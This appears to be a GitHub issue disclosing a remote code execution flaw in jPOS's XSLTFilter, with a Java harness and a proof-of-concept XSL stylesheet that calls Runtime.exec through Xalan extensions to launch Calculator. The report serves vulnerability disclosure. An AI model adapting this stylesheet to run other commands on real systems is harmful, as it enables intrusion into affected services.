Open c1gar opened 2 months ago
In the org.jpos.iso.filter.XSLTFilter.java file, there is a functionality for XSL transformation without setting secure parameters, which poses a risk of Remote Code Execution (RCE). It is recommended to add secure parameters.

maven

```xml
<!-- https://mvnrepository.com/artifact/org.jpos/jpos -->
<dependency>
    <groupId>org.jpos</groupId>
    <artifactId>jpos</artifactId>
    <version>2.1.9</version>
</dependency>
```

POC.java

```java
import org.jpos.iso.ISOChannel;
import org.jpos.iso.ISOException;
import org.jpos.iso.ISOMsg;
import org.jpos.iso.filter.XSLTFilter;
import org.jpos.util.LogEvent;

public class jposTest {
    public static void main(String[] args) throws ISOException {
        ISOChannel channel = new CustomISOChannel();
        ISOMsg m = new ISOMsg();
        LogEvent evt = new LogEvent();
        XSLTFilter xsltFilter = new XSLTFilter("poc.xsl",true);
        xsltFilter.filter(channel,m,evt);
    }
}
```

poc.xsl

```xml
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    <xsl:template match="/">
        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
        <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
        <xsl:variable name="processString" select="ob:toString($process)"/>
        <xsl:value-of select="$processString"/>
    </xsl:template>
</xsl:stylesheet>
```